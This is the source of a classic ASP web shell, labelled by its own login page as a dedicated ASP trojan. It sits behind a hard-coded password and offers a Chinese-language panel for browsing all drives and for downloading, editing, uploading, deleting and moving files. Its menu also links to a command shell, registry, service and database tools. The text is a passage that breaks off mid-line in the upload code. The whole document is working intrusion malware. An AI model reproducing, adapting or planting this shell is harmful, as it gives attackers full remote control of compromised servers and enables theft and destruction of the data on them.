<%
dim ApplicationName,Pass,URL,ServerNM,ServerIP,Action,WWWRoot,FolderPath,FName,BackUrl,RW
Server.ScriptTimeout=50000
On Error Resume Next
ApplicationName = "WebShell"
UserPass = "1" '設置密碼.
URL = Request.ServerVariables("URL")
ServerNM = Request.ServerVariables("SERVER_NAME")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"
If Request("Pass")=UserPass then Session("webadmin")=UserPass
If Session("webadmin")<>UserPass Then
If Request.Form("Pass")<>"" Then
If Request.Form("Pass")=UserPass Then
Session("webadmin")=UserPass
Response.Redirect URL
Else
Response.Write"驗證失敗!"
End If
Else
RW="<center style='font-size:12px'><br><br>WKWL專用ASP木馬"
RW=RW & "<form action='" & URL & "' method='post'>"
RW=RW & "密碼:<input name='Pass' type='password' size='15' style='font-size: 12px;border: menu 1px solid'>"
RW=RW & "?<input type='submit' value='殺進去' style='border-width: 1px'></form></center>"
Response.Write RW
RW=""
End If
Response.End
End If%>
<object runat='server' id='ws' scope='page' classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8'></object>
<object runat='server' id='ws' scope='page' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<object runat='server' id='fso' scope='page' classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object>
<object runat='server' id='sa' scope='page' classid='clsid:13709620-C279-11CE-A49E-444553540000'></object>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=ApplicationName&" - "&ServerIP%></title>
<style type="text/css">
<!--
body,td {font-size: 12px;}
body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;
<%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}
input,select,textarea {font-size: 12px;}
.border{border: menu 1px solid;}
.submit{border-width: 1px;}
a {color: black;text-decoration: none;}
-->
</style>
<script language="javascript">
function yesok(){
if (confirm("確認要執行此操作嗎?"))
return true;
else
return false;
}
function ShowFolder(Folder){
top.addrform.FolderPath.value = Folder;
top.addrform.submit();
}
function FullForm(FName,FAction){
top.hideform.FName.value = FName;
if(FAction=="CopyFile"){
DName = prompt("請輸入復制到目標文件全名稱",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="MoveFile"){
DName = prompt("請輸入移動到目標文件全名稱",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="CopyFolder"){
DName = prompt("請輸入移動到目標文件夾全名稱",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="MoveFolder"){
DName = prompt("請輸入移動到目標文件夾全名稱",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="NewFolder"){
DName = prompt("請輸入要新建的文件夾全名稱",FName);
top.hideform.FName.value = DName;
}else if(FAction=="CreateMdb"){
DName = prompt("請輸入要新建的Mdb文件全名稱,註意不能同名!",FName);
top.hideform.FName.value = DName;
}else if(FAction=="CompactMdb"){
DName = prompt("請輸入要壓縮的Mdb文件全名稱,註意文件是否存在!",FName);
top.hideform.FName.value = DName;
}else{
DName = "Other";
}
if(DName!=null){
top.hideform.Action.value = FAction;
top.hideform.submit();
}else{
top.hideform.FName.value = "";
}
}
function DbCheck(){
if(DbForm.DbStr.value == ""){
alert("請先連接數據庫");
FullDbStr(0);
return false;
}
return true;
}
function FullDbStr(i){
if(i<0){
return false;
}
Str = new Array(12);
Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\DbName.mdb;Jet OLEDB:Database Password=***";
Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";
Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[3] = "Dsn=DsnName";
Str[4] = "SELECT * FROM [TableName] WHERE ID<100";
Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')";
Str[6] = "DELETE FROM [TableName] WHERE ID=100";
Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";
Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[9] = "DROP TABLE [TableName]";
Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";
Str[12]= "當只顯示壹條數據時即可顯示字段的全部字節,可用條件控制查詢實現.\n超過壹條數據只顯示字段的前五十個字節。";
if(i<=3){
DbForm.DbStr.value = Str[i];
DbForm.SqlStr.value = "";
SFSO.innerHTML="<center>請確認己連接數據庫再輸入SQL操作命令語句。</center>";
}else if(i==12){
alert(Str[i]);
}else{
DbForm.SqlStr.value = Str[i];
}
return true;
}
function FullSqlStr(str,pg){
if(DbForm.DbStr.value.length<5){
alert("請檢查數據庫連接串是否正確!")
return false;
}
if(str.length<10){
alert("請檢查SQL語句是否正確!")
return false;
}
DbForm.SqlStr.value = str ;
DbForm.Page.value = pg;
SFSO.innerHTML="";
DbForm.submit();
return true;
}
function CheckAll(){
for (var i=0;i<DownId.length;i++) DownId[i].checked=!DownId[i].checked;
}
function Url(){
for (var i=0;i<DownId.length;i++)
{
if (DownId[i].checked==true)
{
temp.value+=DownId[i].value+"\n";
}
}
if (temp.value=="")
{
window.alert("妳還沒有選擇要下載的地址!");
return false;}
else
{
js=temp.createTextRange();
js.execCommand("Copy");
temp.value="";
window.alert("復制完畢!記得在復制之前打開下載工具監視剪貼板。");
}
}
</script>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body onmouseover="window.status='Powered by:Lzhj QQ:5079087';return true">
<%
Dim ObT(13,1)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,1) = "文件操作組件"
ObT(1,0) = "wscript.shell"
ObT(1,1) = "命令行執行組件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,1) = "ACCESS建庫組件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,1) = "ACCESS壓縮組件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,1) = "數據流上傳輔助組件"
ObT(5,0) = "Adodb.connection"
ObT(5,1) = "數據庫連接組件"
ObT(6,0) = "Adodb.Stream"
ObT(6,1) = "數據流上傳組件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,1) = "SA-FileUp 文件上傳組件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,1) = "劉雲峰文件上傳組件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,1) = "ASPUpload 文件上傳組件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,1) = "JMail 郵件收發組件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,1) = "虛擬SMTP發信組件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,1) = "SmtpMail發信組件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,1) = "數據傳輸組件"
Function IsObj(obt)
dim i,T
on error resume next
Set T=Server.CreateObject(obt)
If -2147221005 <> Err Then
IsObj=True
Else
IsObj=false
Err.Clear
End If
Set T=Nothing
End Function
sub ShowErr()
If Err Then
Response.Write"<br><a href='javascript:history.back()'>?" & Err.Description & "</a>"
Err.Clear:Response.Flush
End If
end sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), "?")
HTMLEncode = S
end if
End Function
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
dim fso,osm,ads,rs,conn
Function MainMenu()
RW="<form name='hideform' method='post' action='" & URL & "' target='FileFrame'>"
RW=RW & "<input type='hidden' name='Action'><input type='hidden' name='FName'></form>"
RW=RW & "<table width='100%' height='100%' border='0' cellpadding='0' cellspacing='0' bgcolor='menu'>"
RW=RW & "<tr><td height='20'>"
RW=RW & "<table width='100%' height='20' border='0' cellpadding='0' cellspacing='0'>"
RW=RW & "<form name='addrform' method='post' action='" & URL & "' target='_parent'>"
RW=RW & "<tr><td width='60' align='center'>地址欄:</td><td>"
RW=RW & "<input name='FolderPath' style='width:100%' value='" & Session("FolderPath") & "' style='border:black 1px solid;'>"
RW=RW & "</td><td width='60' align='center'><input name='Submit' type='submit' value='轉到' class='submit'>"
RW=RW & "</td></tr></form></table></td></tr><tr><td height='20'>?文件操作:"
Set SFSO=New LBF:SFSO.ShowDriver():Set SFSO=Nothing
RW=RW & "<a href='javascript:ShowFolder(""C:\\Progra~1"")'>[程序文件]</a>?<a href='javascript:ShowFolder(""C:\\Docume~1"")'>[我的文檔]</a>?"
RW=RW & "<a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>[網站目錄]</a></tr></td><tr><td height='20'>"
RW=RW & "?切換功能:<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>[新建目錄]</a>?"
RW=RW & "<a href='?Action=EditFile' target='FileFrame'>[新建文本]</a>?<a href='?Action=UpFile' target='FileFrame'>[文件上傳]</a>?"
RW=RW & "<a href='?Action=CmdShell' target='FileFrame'>[CMD命令行]</a>?<a href='?Action=TSearch' target='FileFrame'>[搜索引擎]</a>?"
RW=RW & "<a href='?Action=Course' target='FileFrame'>[系統服務]</a>?<a href='?Action=TRegedit' target='FileFrame'>[註冊表操作]</a>?"
RW=RW & "<a href='?Action=ServerInfo' target='FileFrame'>[服務器信息]</a></td></tr><tr><td height='20'>?數據庫功能:<a href='?Action=DbManager' target='FileFrame'>[數據庫操作]</a>?"
RW=RW & "<a href='?Action=ToMdb' target='FileFrame'>[程序打包入庫/出庫]</a>?|?<a href='?Action=Logout' target='_top'>[退出登錄]</a>"
RW=RW & "<tr><td><iframe name='FileFrame' src='?Action=ShowFile' width='100%' height='100%' frameborder='1' scrolling='yes'></iframe></td></tr></table>"
Response.Write RW
RW=""
End Function
if request("DownFile")<>"" then call DownFile(request("DownFile"))
Function DownFile(Path)
Response.Clear
On Error Resume Next
Set osm = CreateObject(ObT(6,0))
osm.Open
osm.Type = 1
osm.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
Response.AddHeader "Content-Length",osm.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite osm.Read
Response.Flush
osm.Close
Set osm = Nothing
Response.End
End Function
Class LBF
Private Sub Class_Initialize
Set fso=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set fso=Nothing
End Sub
Function ShowDriver()
dim D
For Each D in fso.Drives
RW=RW&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>磁盤["&D.DriveLetter&":]</a>?"
Next
ShowDriver=RW
End Function
Function ShowFile(Path)
dim F,L,Fold,i
RW="<table border='0' cellpadding='2' width='800' height='100%' bgcolor='#EFEFEF' align='center'>"
RW=RW & "<tr><td width='200' valign='top'>"
RW=RW & "<table border='0' cellpadding='0' cellspacing='0' width='100%'>"
RW=RW & "<tr><td width='100%'></td></tr>"
Set FOLD=fso.GetFolder(Path)
For Each F in FOLD.subfolders
RW=RW & "<tr><td width='100%' height='20'><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")'>["&F.Name&"]</a>"
RW=RW & "?|<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()'>刪除</a>"
RW=RW & "?<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'>復制</a>"
RW=RW & "?<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'>移動</a></td></tr>"
Next
RW=RW & "</table></td><td width='600' valign='top' bgcolor='#FFFFFF'><table border='0' cellspacing='1' cellpadding='0' cellspacing='0' width='100%'>"
Response.Write RW : RW=""
For Each L in Fold.files
i=i+1
RW="<tr onMouseOver=""this.className='tr'"" onMouseOut=""this.className=''""> "
RW=RW & "<td width='45%' ><input type='checkbox' name='DownId' value='http://"&ServerNM&URL&"?Pass="&UserPass&"&DownFile="&RePath(Path&"\"&L.Name)&"'>"
RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='下載'>"&L.Name&"</a></td>"
RW=RW & "<td width='10%'>"&clng(L.size/1024)&"K</td>"
RW=RW & "<td width='20%' align='center'>" & year(L.DateLastModified) & "-" & right("0"&month(L.DateLastModified),2) & "-" & right("0"&day(L.DateLastModified),2) & " " & FormatDateTime(L.DateLastModified,4)
RW=RW & "<td width='25%' align='center'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")'>編輯</a>?"
RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")' onclick='return yesok()'>刪除</a>?"
RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")'>復制</a>?"
RW=RW & "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")'>移動</a></td></td></tr>"
Response.Write RW : RW=""
Next
if i>0 then Response.Write "<tr><td><br><input type='checkbox' name='all' value='all' onClick='CheckAll()'>反向選擇?<input type='submit' value='批量下載' name='downurl' style='width:80' onClick='Url()' class='submit'><div style=display:'none'><textarea rows='0' name='temp' cols='0'></textarea></div></td></tr>"
i=0
Response.Write "</table></td></tr></table>"
Set FOLD=Nothing
End Function
Function EditFile(Path)
dim T
If Request("Action2")="Post" Then
Set T=fso.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=Nothing
Set fso=Nothing
RW="<center><br><br><br>文件保存成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
Response.End
End If
If Path<>"" Then
Set T=fso.opentextfile(Path, 1, False)
On Error Resume Next
Txt=HTMLEncode(T.readall)
if err then err.Clear
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
RW="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
RW=RW&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><tr><td height='20' align='center' bgcolor='menu'>文本編輯器</td></tr>"
RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><input name='Action' value='EditFile' Type='hidden'>"
RW=RW&"<input name='FName' value='"&Path&"' style='width:580' class='border'></td></tr>"
RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><textarea name='Content' style='width:580;height:450' class='border'>"&Txt&"</textarea></td></tr>"
RW=RW&"<tr><td bgcolor='#FFFFFF' align='center'><input name='goback' type='button' value='返回' onclick='history.back();' class='submit'><input name='reset' type='reset' value='重置' class='submit'><input name='submit' type='submit' value='保存' class='submit'>"
RW=RW&"</td></tr></form></table>"
Response.Write RW : RW=""
End Function
Function DelFile(Path)
If fso.FileExists(Path) Then
fso.DeleteFile Path
RW="<center><br><br><br>文件 "&Path&" 刪除成功!</center>"
RW=RW & BackUrl
Response.Write RW
End If
End Function
Function CopyFile(Path)
Path = Split(Path,"||||")
If fso.FileExists(Path(0)) and Path(1)<>"" Then
fso.CopyFile Path(0),Path(1)
RW="<center><br><br><br>文件" & Path(0) & "復制成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
Function MoveFile(Path)
Path = Split(Path,"||||")
If fso.FileExists(Path(0)) and Path(1)<>"" Then
fso.MoveFile Path(0),Path(1)
RW="<center><br><br><br>文件" & Path(0) & "移動成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
Function DelFolder(Path)
If fso.FolderExists(Path) Then
fso.DeleteFolder Path
RW="<center><br><br><br>目錄" & Path & "刪除成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
Function CopyFolder(Path)
Path = Split(Path,"||||")
If fso.FolderExists(Path(0)) and Path(1)<>"" Then
fso.CopyFolder Path(0),Path(1)
RW="<center><br><br><br>目錄" & Path(0) & "復制成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
Function MoveFolder(Path)
Path = Split(Path,"||||")
If fso.FolderExists(Path(0)) and Path(1)<>"" Then
fso.MoveFolder Path(0),Path(1)
RW="<center><br><br><br>目錄" & Path(0) & "移動成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
Function NewFolder(Path)
If Not fso.FolderExists(Path) and Path<>"" Then
fso.CreateFolder Path
RW="<center><br><br><br>目錄" & Path & "新建成功!</center>"
RW=RW & BackUrl
Response.Write RW : RW=""
End If
End Function
End Class
Function UpFile()
dim strFileName
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
RW="<br>請輸入上傳的完全路徑後選擇壹個文件上傳!"
Else
F.SaveAs UName
If Err.number=0 Then
RW="<center><br><br><br>文件" & UName & "上傳成功!</center>"
End if
End If
Set F=nothing:Set U=nothing
RW=RW & BackUrl
Response.Write RW
ShowErr()
Response.End
End If
RW="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
RW=RW & "<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
RW=RW & "<tr><td height='20' align='center' bgcolor='menu'>上傳文件</td></tr>"
RW=RW & "<tr><td align='center' bgcolor='#FFFFFF'>"
RW=RW & "上傳路徑:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\newup.asp")&"' style='width:250' class='border'>?"
RW=RW & "<input name='LocalFile' type='file' style='width:225' class='border'>?"
RW=RW & "<input type='submit' name='Submit' value='上傳' class='submit'>"
RW=RW & "</td></tr></form></table>"
Response.Write RW
End Function
Dim T1
Class UPC
Dim D1,D2
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
Private Sub Class_Initialize
Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject("Scripting.Dictionary")
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt